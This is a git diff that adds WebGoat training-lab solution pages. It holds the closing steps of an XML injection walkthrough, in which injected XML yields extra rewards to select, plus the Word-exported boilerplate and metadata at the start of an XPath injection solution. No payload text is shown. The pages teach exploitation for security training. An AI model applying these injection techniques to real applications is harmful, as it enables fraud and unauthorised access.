+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You need to
+do this three times!<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_65" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XMLInjection_files/image022.jpg" v:shapes="Picture_x0020_65"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Injected XML results</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_66" o:spid="_x0000_i1026"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image013.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XMLInjection_files/image023.jpg" v:shapes="Picture_x0020_66"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Select your reward</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select the
+Laptop and the Cruise and click “Submit”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_67" o:spid="_x0000_i1025"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image015.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/XMLInjection_files/image024.jpg" v:shapes="Picture_x0020_67"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>8</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/XMLInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XMLInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/XMLInjection_files/filelist.xml
new file mode 100644
index 000000000..91acaa646
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XMLInjection_files/filelist.xml
@@ -0,0 +1,22 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../XMLInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image019.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image020.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image022.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image023.jpg"/>
+ <o:File HRef="image015.png"/>
+ <o:File HRef="image024.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image001.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image001.png
new file mode 100644
index 000000000..b32e9194e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image003.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image003.png
new file mode 100644
index 000000000..f0de7feb1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image005.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image005.png
new file mode 100644
index 000000000..d2589d1b8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image007.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image007.png
new file mode 100644
index 000000000..d2489a851
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image009.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image009.png
new file mode 100644
index 000000000..c2b095cd1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image011.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image011.png
new file mode 100644
index 000000000..e316c46cb
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image013.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image013.png
new file mode 100644
index 000000000..2c485734d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image015.png b/main/project/WebContent/lesson_solutions/XMLInjection_files/image015.png
new file mode 100644
index 000000000..f59f4c79b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image015.png differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image017.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image017.jpg
new file mode 100644
index 000000000..5cde78c29
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image018.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image018.jpg
new file mode 100644
index 000000000..50a020099
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image019.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image019.jpg
new file mode 100644
index 000000000..3ec8d20a1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image019.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image020.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image020.jpg
new file mode 100644
index 000000000..3181beb41
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image020.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image021.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image021.jpg
new file mode 100644
index 000000000..164e97f7d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image022.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image022.jpg
new file mode 100644
index 000000000..155301a55
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image022.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image023.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image023.jpg
new file mode 100644
index 000000000..3ed684669
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image023.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/image024.jpg b/main/project/WebContent/lesson_solutions/XMLInjection_files/image024.jpg
new file mode 100644
index 000000000..00a8ad33b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/image024.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/XMLInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/XMLInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/XPATHInjection.html b/main/project/WebContent/lesson_solutions/XPATHInjection.html
new file mode 100644
index 000000000..d363b43e8
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XPATHInjection.html
@@ -0,0 +1,780 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/XPATHInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XPATHInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>1200</o:TotalTime>
+  <o:Created>2007-07-12T14:28:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:19:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>258</o:Words>
+  <o:Characters>1473</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>12</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1728</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/XPATHInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XPATHInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
